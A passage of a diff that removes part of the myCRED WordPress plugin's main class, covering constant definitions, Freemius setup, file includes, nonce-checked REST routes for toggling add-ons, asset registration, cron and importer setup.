- $this->internal();
- $this->wordpress();
-
- do_action( 'mycred_ready' );
-
- }
-
- // Plugin Related
- add_filter( 'plugin_action_links_mycred/mycred.php', array( $this, 'plugin_links' ), 10, 4 );
- add_filter( 'plugin_row_meta', array( $this, 'plugin_description_links' ), 10, 2 );
-
- // Text domain hook
- add_action( 'init', array( $this, 'load_plugin_textdomain' ) );
-
- }
-
- /**
- * Define Constants
- * First, we start with defining all requires constants if they are not defined already.
- * @since 1.7
- * @version 1.0.2
- */
- private function define_constants() {
-
- // Ok to override
- $this->define( 'myCRED_VERSION', $this->version );
- $this->define( 'myCRED_DB_VERSION', '2.0' );
- $this->define( 'MYCRED_SLUG', 'mycred' );
- $this->define( 'MYCRED_MAIN_SLUG', 'mycred-main' );
- $this->define( 'MYCRED_DEFAULT_LABEL', 'myCRED' );
- $this->define( 'MYCRED_DEFAULT_TYPE_KEY', 'mycred_default' );
- $this->define( 'MYCRED_SHOW_PREMIUM_ADDONS', true );
- $this->define( 'MYCRED_FOR_OLDER_WP', false );
- $this->define( 'MYCRED_MIN_TIME_LIMIT', 3 );
- $this->define( 'MYCRED_ENABLE_TOTAL_BALANCE', true );
- $this->define( 'MYCRED_ENABLE_LOGGING', true );
- $this->define( 'MYCRED_ENABLE_SHORTCODES', true );
- $this->define( 'MYCRED_ENABLE_HOOKS', true );
- $this->define( 'MYCRED_UNINSTALL_LOG', true );
- $this->define( 'MYCRED_UNINSTALL_CREDS', true );
- $this->define( 'MYCRED_DISABLE_PROTECTION', false );
- $this->define( 'MYCRED_CACHE_LEADERBOARDS', false );
- $this->define( 'MYCRED_MAX_HISTORY_SIZE', 100 );
-
- // Not ok to override
- $this->define( 'myCRED_THIS', __FILE__, false );
- $this->define( 'myCRED_ROOT_DIR', plugin_dir_path( myCRED_THIS ), false );
- $this->define( 'myCRED_ABSTRACTS_DIR', myCRED_ROOT_DIR . 'abstracts/', false );
- $this->define( 'myCRED_ADDONS_DIR', myCRED_ROOT_DIR . 'addons/', false );
- $this->define( 'myCRED_ASSETS_DIR', myCRED_ROOT_DIR . 'assets/', false );
- $this->define( 'myCRED_INCLUDES_DIR', myCRED_ROOT_DIR . 'includes/', false );
- $this->define( 'myCRED_LANG_DIR', myCRED_ROOT_DIR . 'lang/', false );
- $this->define( 'myCRED_MODULES_DIR', myCRED_ROOT_DIR . 'modules/', false );
- $this->define( 'myCRED_MEMBERSHIP_DIR', myCRED_ROOT_DIR . 'membership/', false );
- $this->define( 'myCRED_CLASSES_DIR', myCRED_INCLUDES_DIR . 'classes/', false );
- $this->define( 'myCRED_IMPORTERS_DIR', myCRED_INCLUDES_DIR . 'importers/', false );
- $this->define( 'myCRED_BLOCKS_DIR', myCRED_INCLUDES_DIR . 'mycred-blocks/', false );
- $this->define( 'myCRED_ELEMENTOR_DIR', myCRED_INCLUDES_DIR . 'mycred-elementor/', false );
- $this->define( 'myCRED_SHORTCODES_DIR', myCRED_INCLUDES_DIR . 'shortcodes/', false );
- $this->define( 'myCRED_WIDGETS_DIR', myCRED_INCLUDES_DIR . 'widgets/', false );
- $this->define( 'myCRED_HOOKS_DIR', myCRED_INCLUDES_DIR . 'hooks/', false );
- $this->define( 'myCRED_PLUGINS_DIR', myCRED_HOOKS_DIR . 'external/', false );
-
- }
-
- public function myc_fs() {
-
- global $myc_fs;
-
- if ( ! isset( $myc_fs ) ) {
- // Include Freemius SDK.
- $this->file( myCRED_ROOT_DIR . '/freemius/start.php' );
-
- $redirect_path = 'admin.php?page=mycred-main&mycred_tour_guide=1';
-
- if ( mycred_get_option( 'mycred_deactivated_on', false ) != false ) {
- //$redirect_path = 'admin.php?page=mycred-main';
- }
-
- $myc_fs = fs_dynamic_init(
- array(
- 'id' => '6028',
- 'slug' => 'mycred',
- 'type' => 'plugin',
- 'public_key' => 'pk_344d67bf205780ac80f04a7561acb',
- 'is_premium' => false,
- 'has_addons' => false,
- 'has_paid_plans' => false,
- 'menu' => array(
- 'slug' => 'mycred-main',
- 'first-path' => $redirect_path,
- 'account' => false,
- 'contact' => false,
- 'support' => false,
- 'network' => true,
- ),
- )
- );
- }
-
- return $myc_fs;
-
- }
-
- /**
- * Include Plugin Files
- * @since 1.7
- * @since 2.4 Tools Import/ Export Added
- * @version 1.3
- */
- public function includes() {
-
- $this->file( myCRED_INCLUDES_DIR . 'mycred-functions.php' );
-
- $this->file( myCRED_CLASSES_DIR . 'class.query-log.php' );
- $this->file( myCRED_CLASSES_DIR . 'class.query-export.php' );
- $this->file( myCRED_CLASSES_DIR . 'class.query-leaderboard.php' );
-
- $this->file( myCRED_ABSTRACTS_DIR . 'mycred-abstract-hook.php' );
- $this->file( myCRED_ABSTRACTS_DIR . 'mycred-abstract-module.php' );
- $this->file( myCRED_ABSTRACTS_DIR . 'mycred-abstract-object.php' );
-
- // Multisite Feature - Option to block usage of myCRED on a particular site
- if ( ! mycred_is_site_blocked() ) {
-
- // Core
- $this->file( myCRED_INCLUDES_DIR . 'mycred-object.php' );
- $this->file( myCRED_INCLUDES_DIR . 'mycred-remote.php' );
- $this->file( myCRED_INCLUDES_DIR . 'mycred-protect.php' );
- $this->file( myCRED_INCLUDES_DIR . 'mycred-about.php' );
- $this->file( myCRED_INCLUDES_DIR . 'mycred-nav-menu.php' );
- $this->file( myCRED_INCLUDES_DIR . 'mycred-tools.php' );
- $this->file( myCRED_INCLUDES_DIR . 'mycred-tools-bulk-assign.php' );
- $this->file( myCRED_INCLUDES_DIR . 'mycred-tools-setup-import-export.php' );
- $this->file( myCRED_INCLUDES_DIR . 'mycred-tools-import-export.php' );
- // myCred Dashboard
- $this->file( myCRED_INCLUDES_DIR . 'dashboard/mycred-dashboard.php' );
- if( isset ( $_GET['mycred_tour_guide'] ) ){
-
- $this->file( myCRED_INCLUDES_DIR . 'mycred-walkthrough.php' );
- $walkthrough = new myCRED_walkthroug();
-
- }
-
- // If myCRED has been setup and is ready to begin
- if ( mycred_is_installed() ) {
-
- $this->file( myCRED_MEMBERSHIP_DIR . 'mycred-connect-membership.php' );
- $this->file( myCRED_INCLUDES_DIR . 'mycred-main-menu.php' );
- $this->file( myCRED_INCLUDES_DIR . 'mycred-database-upgrade.php' );
- $this->file( myCRED_INCLUDES_DIR . 'mycred-admin-notices.php' );
-
- // Modules
- $this->file( myCRED_MODULES_DIR . 'mycred-module-addons.php' );
- $this->file( myCRED_MODULES_DIR . 'mycred-module-settings.php' );
- $this->file( myCRED_MODULES_DIR . 'mycred-module-hooks.php' );
- $this->file( myCRED_MODULES_DIR . 'mycred-module-log.php' );
- $this->file( myCRED_MODULES_DIR . 'mycred-module-export.php' );
- $this->file( myCRED_MODULES_DIR . 'mycred-module-management.php' );
- $this->file( myCRED_MODULES_DIR . 'mycred-module-br-social-share.php' );
- $this->file( myCRED_MODULES_DIR . 'mycred-module-management.php' );
- $this->file( myCRED_MODULES_DIR . 'mycred-module-caching.php' );
-
- // Mycred Blocks
- $this->file( myCRED_BLOCKS_DIR . 'mycred-blocks.php' );
-
- $this->file( myCRED_ELEMENTOR_DIR . 'mycred-elementor.php' );
-
- //Uninstall Settings
- $this->file( myCRED_INCLUDES_DIR . 'mycred-uninstall.php' );
-
- if ( is_multisite() ) {
-
- $this->file( myCRED_MODULES_DIR . 'mycred-module-network.php' );
-
- }
-
- }
-
- }
-
- }
-
- /**
- * Internal Setup
- * @since 1.8
- * @version 1.0
- */
- private function include_hooks() {
-
- if ( MYCRED_ENABLE_HOOKS === false ) return;
-
- // Built-in Hooks
- $this->file( myCRED_HOOKS_DIR . 'mycred-hook-anniversary.php' );
- $this->file( myCRED_HOOKS_DIR . 'mycred-hook-comments.php' );
- $this->file( myCRED_HOOKS_DIR . 'mycred-hook-delete-content.php' );
- $this->file( myCRED_HOOKS_DIR . 'mycred-hook-link-clicks.php' );
- $this->file( myCRED_HOOKS_DIR . 'mycred-hook-logins.php' );
- $this->file( myCRED_HOOKS_DIR . 'mycred-hook-publishing-content.php' );
- $this->file( myCRED_HOOKS_DIR . 'mycred-hook-referrals.php' );
- $this->file( myCRED_HOOKS_DIR . 'mycred-hook-registrations.php' );
- $this->file( myCRED_HOOKS_DIR . 'mycred-hook-site-visits.php' );
- $this->file( myCRED_HOOKS_DIR . 'mycred-hook-view-content.php' );
- $this->file( myCRED_HOOKS_DIR . 'mycred-hook-watching-video.php' );
- $this->file( myCRED_HOOKS_DIR . 'mycred-hook-view-content-specific.php' );
- $this->file( myCRED_HOOKS_DIR . 'mycred-hook-view-content-specific-author.php' );
-
- // Supported plugins
- $this->file( myCRED_PLUGINS_DIR . 'mycred-hook-affiliatewp.php' );
- $this->file( myCRED_PLUGINS_DIR . 'mycred-hook-badgeOS.php' );
- $this->file( myCRED_PLUGINS_DIR . 'mycred-hook-bbPress.php' );
- $this->file( myCRED_PLUGINS_DIR . 'mycred-hook-buddypress-media.php' );
- $this->file( myCRED_PLUGINS_DIR . 'mycred-hook-buddypress.php' );
- $this->file( myCRED_PLUGINS_DIR . 'mycred-hook-contact-form7.php' );
- $this->file( myCRED_PLUGINS_DIR . 'mycred-hook-events-manager-light.php' );
- $this->file( myCRED_PLUGINS_DIR . 'mycred-hook-gravityforms.php' );
- $this->file( myCRED_PLUGINS_DIR . 'mycred-hook-invite-anyone.php' );
- $this->file( myCRED_PLUGINS_DIR . 'mycred-hook-jetpack.php' );
- $this->file( myCRED_PLUGINS_DIR . 'mycred-hook-simplepress.php' );
- $this->file( myCRED_PLUGINS_DIR . 'mycred-hook-woocommerce.php' );
- $this->file( myCRED_PLUGINS_DIR . 'mycred-hook-wp-favorite-posts.php' );
- $this->file( myCRED_PLUGINS_DIR . 'mycred-hook-wp-polls.php' );
- $this->file( myCRED_PLUGINS_DIR . 'mycred-hook-wp-postratings.php' );
-
- }
-
- /**
- * Internal Setup
- * @since 1.7
- * @version 1.0
- */
- private function internal() {
-
- $this->point_types = mycred_get_types( true );
- $this->modules = array(
- 'solo' => array(),
- 'type' => array()
- );
-
- $this->pre_init_globals();
-
- }
-
- /**
- * Pre Init Globals
- * Globals that does not reply on external sources and can be loaded before init.
- * @since 1.7
- * @version 1.1
- */
- private function pre_init_globals() {
-
- global $mycred, $mycred_log_table, $mycred_types, $mycred_modules, $mycred_label, $mycred_network;
-
- $mycred = new myCRED_Settings();
- $mycred_log_table = $mycred->log_table;
- $mycred_types = $this->point_types;
- $mycred_label = apply_filters( 'mycred_label', MYCRED_DEFAULT_LABEL );
- $mycred_modules = $this->modules;
- $mycred_network = mycred_get_settings_network();
-
- }
-
- /**
- * WordPress
- * Next we hook into WordPress
- * @since 1.7
- * @version 1.0.1
- */
- public function wordpress() {
-
- add_action( 'plugins_loaded', array( $this, 'after_plugin' ), 999 );
- add_action( 'after_setup_theme', array( $this, 'after_theme' ), 50 );
- add_action( 'after_setup_theme', array( $this, 'load_shortcodes' ), 60 );
- add_action( 'init', array( $this, 'init' ), 5 );
- add_action( 'widgets_init', array( $this, 'widgets_init' ), 50 );
- add_action( 'admin_init', array( $this, 'admin_init' ), 50 );
-
- add_action( 'mycred_reset_key', array( $this, 'cron_reset_key' ), 10 );
- add_action( 'mycred_reset_key', array( $this, 'cron_delete_leaderboard_cache' ), 20 );
-
- // added in 2.5
- add_action( 'mycred_after_plugin_loaded', array( $this, 'after_mycred_loaded' ) );
-
- }
-
- /**
- * After Plugins Loaded
- * Used to setup modules that are not replacable.
- * @since 1.7
- * @version 1.0
- */
- public function after_plugin() {
-
- $this->modules['solo']['addons'] = new myCRED_Addons_Module();
- $this->modules['solo']['addons']->load();
- $this->modules['solo']['addons']->run_addons();
-
- //added in 2.5
- do_action( 'mycred_after_plugin_loaded' );
-
- }
-
- /**
- * After Themes Loaded
- * Used to load internal features via modules.
- * @since 1.7
- * @version 1.1
- */
- public function after_theme() {
-
- global $mycred, $mycred_modules;
-
- // Lets start with Multisite
- if ( is_multisite() ) {
-
- // Normally the is_plugin_active_for_network() function is only available in the admin area
- if ( ! function_exists( 'is_plugin_active_for_network' ) )
- $this->file( ABSPATH . '/wp-admin/includes/plugin.php' );
-
- // The network "module" is only needed if the plugin is activated network wide
- if ( is_plugin_active_for_network( 'mycred/mycred.php' ) ) {
- $this->modules['solo']['network'] = new myCRED_Network_Module();
- $this->modules['solo']['network']->load();
- }
-
- }
-
- // The log module can not be loaded if logging is disabled
- if ( MYCRED_ENABLE_LOGGING ) {
-
- // Attach the log to each point type we use
- foreach ( $this->point_types as $type => $title ) {
- $this->modules['type'][ $type ]['log'] = new myCRED_Log_Module( $type );
- $this->modules['type'][ $type ]['log']->load();
- }
-
- }
-
- // Option to disable hooks
- if ( MYCRED_ENABLE_HOOKS ) {
-
- $this->include_hooks();
-
- do_action( 'mycred_load_hooks' );
-
- // Attach hooks module to each point type we use
- foreach ( $this->point_types as $type => $title ) {
- $this->modules['type'][ $type ]['hooks'] = new myCRED_Hooks_Module( $type );
- $this->modules['type'][ $type ]['hooks']->load();
- }
-
- }
-
- // Attach each module to each point type we use
- foreach ( $this->point_types as $type => $title ) {
-
- $this->modules['type'][ $type ]['settings'] = new myCRED_Settings_Module( $type );
- $this->modules['type'][ $type ]['settings']->load();
-
- $this->modules['solo'][ $type ] = new myCRED_Caching_Module( $type );
- $this->modules['solo'][ $type ]->load();
-
- }
-
- // Attach the Management module to the main point type
- $this->modules['type'][ MYCRED_DEFAULT_TYPE_KEY ]['management'] = new myCRED_Management_Module();
- $this->modules['type'][ MYCRED_DEFAULT_TYPE_KEY ]['management']->load();
-
- // Attach BuddyPress module to the main point type only
- if ( class_exists( 'BuddyPress' ) ) {
-
- $this->file( myCRED_MODULES_DIR . 'mycred-module-buddypress.php' );
- $this->modules['type'][ MYCRED_DEFAULT_TYPE_KEY ]['buddypress'] = new myCRED_BuddyPress_Module( MYCRED_DEFAULT_TYPE_KEY );
- $this->modules['type'][ MYCRED_DEFAULT_TYPE_KEY ]['buddypress']->load();
-
- }
-
- $mycred_modules = $this->modules['type'];
-
- // The export module can not be loaded if logging is disabled
- if ( MYCRED_ENABLE_LOGGING ) {
-
- // Load Export module
- $this->modules['solo']['exports'] = new myCRED_Export_Module();
- $this->modules['solo']['exports']->load();
-
- }
-
- // Let third-parties register and load custom myCRED modules
- $mycred_modules = apply_filters( 'mycred_load_modules', $this->modules, $this->point_types );
-
- // Let others play
- do_action( 'mycred_pre_init' );
-
- }
-
- /**
- * Load Shortcodes
- * @since 1.7
- * @version 1.1
- */
- public function load_shortcodes() {
-
- if ( MYCRED_ENABLE_SHORTCODES ) {
-
- $this->file( myCRED_SHORTCODES_DIR . 'mycred_exchange.php' );
- $this->file( myCRED_SHORTCODES_DIR . 'mycred_hide_if.php' );
- $this->file( myCRED_SHORTCODES_DIR . 'mycred_leaderboard_position.php' );
- $this->file( myCRED_SHORTCODES_DIR . 'mycred_leaderboard.php' );
- $this->file( myCRED_SHORTCODES_DIR . 'mycred_my_balance.php' );
- $this->file( myCRED_SHORTCODES_DIR . 'mycred_send.php' );
- $this->file( myCRED_SHORTCODES_DIR . 'mycred_show_if.php' );
- $this->file( myCRED_SHORTCODES_DIR . 'mycred_total_balance.php' );
- $this->file( myCRED_SHORTCODES_DIR . 'mycred_my_balance_converted.php' );
-
- // These shortcodes will not work if logging is disabled
- if ( MYCRED_ENABLE_LOGGING ) {
-
- $this->file( myCRED_SHORTCODES_DIR . 'mycred_best_user.php' );
- $this->file( myCRED_SHORTCODES_DIR . 'mycred_give.php' );
- $this->file( myCRED_SHORTCODES_DIR . 'mycred_history.php' );
- $this->file( myCRED_SHORTCODES_DIR . 'mycred_total_points.php' );
- $this->file( myCRED_SHORTCODES_DIR . 'mycred_total_since.php' );
-
- }
-
- // These shortcodes will not work if hooks are disabled
- if ( MYCRED_ENABLE_HOOKS ) {
-
- $this->file( myCRED_SHORTCODES_DIR . 'mycred_referral_stats.php' );
- $this->file( myCRED_SHORTCODES_DIR . 'mycred_affiliate_id.php' );
- $this->file( myCRED_SHORTCODES_DIR . 'mycred_affiliate_link.php' );
- $this->file( myCRED_SHORTCODES_DIR . 'mycred_link.php' );
- $this->file( myCRED_SHORTCODES_DIR . 'mycred_video.php' );
- $this->file( myCRED_SHORTCODES_DIR . 'mycred_hook_table.php' );
-
- }
-
- do_action( 'mycred_load_shortcode' );
-
- }
-
- }
-
- /**
- * Init
- * General plugin setup during the init hook.
- * @since 1.7
- * @version 1.0
- */
- public function init() {
-
- // Let others play
- do_action( 'mycred_init' );
-
- // Lets begin
- $this->post_init_globals();
-
- // Register Assets
- $this->register_assets();
-
- // Setup Cron
- $this->setup_cron_jobs();
-
- // Enqueue scripts & styles
- add_action( 'wp_enqueue_scripts', array( $this, 'enqueue_front_before' ) );
- add_action( 'wp_footer', array( $this, 'enqueue_front_after' ) );
-
- add_action( 'admin_enqueue_scripts', array( $this, 'enqueue_admin_before' ) );
-
- // Admin bar and toolbar adjustments
- add_action( 'admin_menu', array( $this, 'adjust_admin_menu' ), 9 );
- add_action( 'admin_bar_menu', array( $this, 'adjust_toolbar' ) );
-
- add_filter( 'admin_body_class', array( $this, 'add_mycred_admin_body_class' ) );
-
- add_action( 'rest_api_init' , array( $this, 'rest_api_mycred_core_addons' ) );
-
- }
-
- public function rest_api_mycred_core_addons() {
-
- register_rest_route('mycred/v1', '/enable-core-addon', array(
- 'methods' => 'POST',
- 'callback' => array( $this, 'mycred_enable_core_addon' ),
- 'permission_callback' => array( $this, 'verify_nonce_and_permissions' )
- ));
-
- register_rest_route('mycred/v1', '/get-core-addons', array(
- 'methods' => 'GET',
- 'callback' => array( $this, 'get_core_addons_callback' ),
- 'permission_callback' => array( $this, 'verify_nonce_and_permissions' )
- ));
-
- }
-
- public function verify_nonce_and_permissions( $request ) {
- $nonce = $request->get_header( 'X-WP-Nonce' );
-
- if ( ! $nonce ) {
- return new WP_Error(
- 'rest_missing_nonce',
- __( 'Missing nonce.', 'mycred' ),
- array( 'status' => 403 )
- );
- }
-
- if ( ! wp_verify_nonce( $nonce, 'wp_rest' ) ) {
- return new WP_Error(
- 'rest_invalid_nonce',
- __( 'Invalid nonce.', 'mycred' ),
- array( 'status' => 403 )
- );
- }
-
- if ( ! current_user_can( 'manage_options' ) ) {
- return new WP_Error(
- 'rest_forbidden',
- __( 'You do not have permission to perform this action.', 'mycred' ),
- array( 'status' => 403 )
- );
- }
-
- return true;
- }
-
- public function get_core_addons_callback($request) {
-
- $enabled_addons = get_option( 'mycred_pref_addons', array() );
-
- $addons = ! empty( $enabled_addons['active'] ) ? $enabled_addons['active'] : array();
-
- return rest_ensure_response( $addons );
-
- }
-
- public function mycred_enable_core_addon($request) {
-
- $nonce = $request->get_header('X-WP-Nonce');
- if ( ! wp_verify_nonce( $nonce, 'wp_rest' ) ) {
- return new WP_Error( 'rest_forbidden', __('Invalid nonce.', 'mycred'), array( 'status' => 403 ) );
- }
-
- $params = $request->get_json_params();
-
- $addOnSlug = isset( $params['addOnSlug'] ) ? sanitize_text_field( $params['addOnSlug'] ) : '';
- $addOnTitle = isset( $params['addOnTitle'] ) ? sanitize_text_field( $params['addOnTitle'] ) : '';
-
- // Get current enabled add-ons
- $addons_prefs = get_option( 'mycred_pref_addons', array() );
-
- // Toggle the enabled state
- if ( ! empty( $addons_prefs['active'] ) && in_array( $addOnSlug, $addons_prefs['active'] ) ) {
-
- // Disable the add-on
- $addons_prefs['active'] = array_diff( $addons_prefs['active'], array( $addOnSlug ) );
- $message = sprintf( 'Add-on "%s" has been disabled successfully.', $addOnTitle );
- $toggle = false;
-
- }
- else {
-
- // Enable the add-on
- $addons_prefs['active'][] = $addOnSlug;
- $message = sprintf( 'Add-on "%s" has been enabled successfully.', $addOnTitle );
- $toggle = true;
-
- }
-
- // Update the Addons Prefs
- update_option( 'mycred_pref_addons', $addons_prefs );
-
- return rest_ensure_response(array(
- 'status' => 'success',
- 'message' => $message,
- 'enabled_addon' => $addOnSlug,
- 'toggle' => $toggle
- ));
-
- }
-
- /**
- * Post Init Globals
- * Globals that needs to be defined after init. Mainly used for user related globals.
- * @since 1.7
- * @version 1.1
- */
- private function post_init_globals() {
-
- // Just in case, this should never happen
- if ( ! did_action( 'init' ) || did_action( 'mycred_set_globals' ) ) return;
-
- if ( is_user_logged_in() )
- mycred_set_current_account();
-
- do_action( 'mycred_set_globals' );
-
- }
-
-
- /**
- * Register Assets
- * @since 1.7
- * @version 1.1
- */
- public function register_assets() {
-
- // Styles
- wp_register_style( 'mycred-front', plugins_url( 'assets/css/mycred-front.css', myCRED_THIS ), array(), $this->version, 'all' );
- wp_register_style( 'mycred-admin-ui', plugins_url( 'assets/css/mycred-admin-ui.css', myCRED_THIS ), array(), $this->version, 'all' );
- wp_register_style( 'mycred-buttons', plugins_url( 'assets/css/mycred-buttons.css', myCRED_THIS ), array(), $this->version, 'all' );
- wp_register_style( 'mycred-bootstrap-grid', plugins_url( 'assets/css/bootstrap-grid.css', myCRED_THIS ), array(), $this->version, 'all' );
- wp_register_style( 'mycred-select2-style', plugins_url( 'assets/css/select2.css', myCRED_THIS ), array(), $this->version, 'all' );
- wp_register_style( 'mycred-metabox', plugins_url( 'assets/css/mycred-metabox.css', myCRED_THIS ), array(), $this->version, 'all' );
-
- //Badge, Rank Social Share Sheets
- wp_register_style( 'mycred-social-share-icons', plugins_url( 'assets/css/mycred-social-icons.css', myCRED_THIS ), array(), $this->version, 'all' );
- wp_register_style( 'mycred-social-share-style', plugins_url( 'assets/css/mycred-social-share.css', myCRED_THIS ), array(), $this->version, 'all' );
-
- // BuddyBoss Style Sheet
- wp_register_style( 'mycred-buddyboss-style', plugins_url( 'assets/css/mycred-buddyboss.css', myCRED_THIS ), array(), $this->version, 'all' );
-
- // Scripts
- wp_register_script( 'mycred-send-points', plugins_url( 'assets/js/send.js', myCRED_THIS ), array( 'jquery' ), $this->version, true );
- wp_register_script( 'mycred-accordion', plugins_url( 'assets/js/mycred-accordion.js', myCRED_THIS ), array( 'jquery', 'jquery-ui-core', 'jquery-ui-accordion' ), $this->version );
- wp_register_script( 'jquery-numerator', plugins_url( 'assets/libs/jquery-numerator.js', myCRED_THIS ), array( 'jquery' ), '0.2.1' );
- wp_register_script( 'mycred-mustache', plugins_url( 'assets/libs/mustache.min.js', myCRED_THIS ), array(), '2.2.1' );
- wp_register_script( 'mycred-widgets', plugins_url( 'assets/js/mycred-admin-widgets.js', myCRED_THIS ), array( 'jquery', 'jquery-ui-sortable', 'jquery-ui-draggable', 'jquery-ui-droppable' ), $this->version );
- wp_register_script( 'mycred-edit-balance', plugins_url( 'assets/js/mycred-edit-balance.js', myCRED_THIS ), array( 'jquery', 'jquery-ui-core', 'jquery-ui-dialog', 'jquery-effects-core', 'jquery-effects-slide', 'jquery-numerator' ), $this->version );
- wp_register_script( 'mycred-edit-log', plugins_url( 'assets/js/mycred-edit-log.js', myCRED_THIS ), array( 'jquery', 'jquery-ui-core', 'jquery-ui-dialog', 'jquery-effects-core', 'jquery-effects-slide', 'common' ), $this->version );
- wp_register_script( 'mycred-select2-script', plugins_url( 'assets/js/select2.js', myCRED_THIS ), array( 'jquery' ), $this->version, true );
- wp_register_script( 'mycred-specific-content-script', plugins_url( 'assets/js/script.js', myCRED_THIS ), array( 'jquery' ), $this->version, true );
- wp_register_script('mycred-toolkit-script', plugins_url('includes/toolkit/build/admin.bundle.js', myCRED_THIS), array('wp-element'), '1.0.0',true );
-
-
- do_action( 'mycred_register_assets' );
-
- }
-
- /**
- * Setup Cron Jobs
- * @since 1.7
- * @version 1.0
- */
- private function setup_cron_jobs() {
-
- // Add schedule if none exists
- if ( ! wp_next_scheduled( 'mycred_reset_key' ) )
- wp_schedule_event( time(), apply_filters( 'mycred_cron_reset_key', 'daily' ), 'mycred_reset_key' );
-
- }
-
- /**
- * Register Importers
- * @since 1.7
- * @version 1.0.1
- */
- private function register_importers() {
-
- /**
- * Register Importer: Log Entries
- * @since 1.4
- * @version 1.0
- */
- register_importer(
- MYCRED_SLUG . '-import-log',
- sprintf( __( '%s Log Import', 'mycred' ), mycred_label() ),
- __( 'Import log entries via a CSV file.', 'mycred' ),
- array( $this, 'import_log_entries' )
- );
-
- /**
- * Register Importer: Balances
- * @since 1.4.2
- * @version 1.0
- */
- register_importer(
- MYCRED_SLUG . '-import-balance',
- sprintf( __( '%s Balance Import', 'mycred' ), mycred_label() ),
- __( 'Import balances via a CSV file.', 'mycred' ),
- array( $this, 'import_balances' )
- );
-
- /**
- * Register Importer: CubePoints
- * @since 1.4
- * @version 1.0
- */
- register_importer(
- MYCRED_SLUG . '-import-cp',
- sprintf( __( '%s CubePoints Import', 'mycred' ), mycred_label() ),
- __( 'Import CubePoints log entries and / or balances.', 'mycred' ),
- array( $this, 'import_cubepoints' )
- );
-
- }
-
- /**
- * Front Enqueue Before
- * Enqueues scripts and styles that must run before content is loaded.
- * @since 1.7
- * @version 1.1
- */
- public function enqueue_front_before() {
-
- // Widget Style (can be disabled)
- if ( apply_filters( 'mycred_remove_widget_css', false ) === false )
- wp_enqueue_style( 'mycred-front' );
-
- wp_enqueue_style( 'mycred-social-share-icons' );
- wp_enqueue_style( 'mycred-social-share-style' );
-
- if( 'BuddyBoss Theme' === wp_get_theme()->name ) {
- wp_enqueue_style( 'mycred-buddyboss-style' );
- }
-
- // Let others play
- do_action( 'mycred_front_enqueue' );
-
- }
-
- /**
- * Front Enqueue After
- * Enqueuest that must run after content has loaded.
- * @since 1.7
- * @version 1.0
- */
- public function enqueue_front_after() {
-
- global $mycred_sending_points;
-
- // myCRED Send Feature via the mycred_send shortcode
- if ( $mycred_sending_points === true || apply_filters( 'mycred_enqueue_send_js', false ) === true ) {
-
- $base = array(
- 'ajaxurl' => admin_url( 'admin-ajax.php' ),
- 'token' => wp_create_nonce( 'mycred-send-points' )
- );
-
- $language = apply_filters( 'mycred_send_language', array(
- 'working' => esc_attr__( 'Processing...', 'mycred' ),
- 'done' => esc_attr__( 'Sent', 'mycred' ),
- 'error' => esc_attr__( 'Error - Try Again', 'mycred' )
- ) );
-
- wp_localize_script(
- 'mycred-send-points',
- 'myCREDsend',
- array_merge_recursive( $base, $language )
- );
- wp_enqueue_script( 'mycred-send-points' );
-
- }
-
- do_action( 'mycred_front_enqueue_footer' );
-
- }
-
- /**
- * Admin Enqueue
- * @since 1.7
- * @version 1.2
- */
- public function enqueue_admin_before() {
-
- wp_enqueue_style( 'mycred-admin-ui' );
- wp_enqueue_style( 'mycred-social-share-icons' );
- wp_enqueue_style( 'mycred-social-share-style' );
-
- // Let others play
- do_action( 'mycred_admin_enqueue' );
-
- }
-
- /**
- * Widgets Init
- * @since 1.7
- * @version 1.0
- */
- public function widgets_init() {
-
- // Balance widget
- $this->file( myCRED_WIDGETS_DIR . 'mycred-widget-balance.php' );
- register_widget( 'myCRED_Widget_Balance' );
-
- // Leaderboard widget
- $this->file( myCRED_WIDGETS_DIR . 'mycred-widget-leaderboard.php' );
- register_widget( 'myCRED_Widget_Leaderboard' );
-
- // If we have more than one point type, the wallet widget
- if ( count( $this->point_types ) > 1 ) {
-
- $this->file( myCRED_WIDGETS_DIR . 'mycred-widget-wallet.php' );
- register_widget( 'myCRED_Widget_Wallet' );
-
- }
-
- // Let others play
- do_action( 'mycred_widgets_init' );
-
- }
-
- /**
- * Admin Init
- * @since 1.7
- * @version 1.0
- */
- public function admin_init() {
-
- // Sudden change of version number indicates an update
- $mycred_version = get_option( 'mycred_version', $this->version );
- if ( $mycred_version != $this->version )
- do_action( 'mycred_reactivation', $mycred_version );
-
- // Dashboard Overview
- $this->file( myCRED_INCLUDES_DIR . 'mycred-overview.php' );
-
- // Importers
- if ( defined( 'WP_LOAD_IMPORTERS' ) )
- $this->register_importers();
-
- global $pagenow;
- if ( $pagenow == 'admin.php' && isset( $_GET['page'] ) && $_GET['page'] == 'mycred-about' ) {
- remove_all_actions( 'admin_notices' );
- }
-
- // Let others play
- do_action( 'mycred_admin_init' );
- }
-
- /**
- * Load Importer: Log Entries
- * @since 1.4
- * @version 1.1
- */
- public function import_log_entries() {
-
- $this->file( ABSPATH . 'wp-admin/includes/import.php' );
-
- if ( ! class_exists( 'WP_Importer' ) )
- $this->file( ABSPATH . 'wp-admin/includes/class-wp-importer.php' );
-
- $this->file( myCRED_IMPORTERS_DIR . 'mycred-log-entries.php' );
-
- $importer = new myCRED_Importer_Log_Entires();
- $importer->load();
-
- }
-
- /**
- * Load Importer: Point Balances
- * @since 1.4
- * @version 1.1
- */
- public function import_balances() {
-
- $this->file( ABSPATH . 'wp-admin/includes/import.php' );
-
- if ( ! class_exists( 'WP_Importer' ) )
- $this->file( ABSPATH . 'wp-admin/includes/class-wp-importer.php' );
-
- $this->file( myCRED_IMPORTERS_DIR . 'mycred-balances.php' );
-
- $importer = new myCRED_Importer_Balances();
- $importer->load();
-
- }
-
- /**
- * Load Importer: CubePoints
- * @since 1.4
- * @version 1.1.1
- */
- public function import_cubepoints() {
-
- $this->file( ABSPATH . 'wp-admin/includes/import.php' );
-
- if ( ! class_exists( 'WP_Importer' ) )
- $this->file( ABSPATH . 'wp-admin/includes/class-wp-importer.php' );
-
- $this->file( myCRED_IMPORTERS_DIR . 'mycred-cubepoints.php' );
-
- $importer = new myCRED_Importer_CubePoints();
- $importer->load();
-
- }
-
- /**
- * Admin Menu
- * @since 1.7
- * @version 1.0
- */
- public function adjust_admin_menu() {
-
- global $mycred, $wp_version;
-
- $pages = array();
- $name = mycred_label( true );
- $menu_icon = 'dashicons-star-filled';
-
- if ( version_compare( $wp_version, '3.8', '<' ) )
- $menu_icon = '';
-
- $main_menu = new myCRED_Main_Menu( $this->modules );
-
- // Add skeleton menus for each point type so modules can
- // insert their content under each of these menus
- foreach ( $this->point_types as $type_id => $title ) {
-
- $type_slug = MYCRED_SLUG;
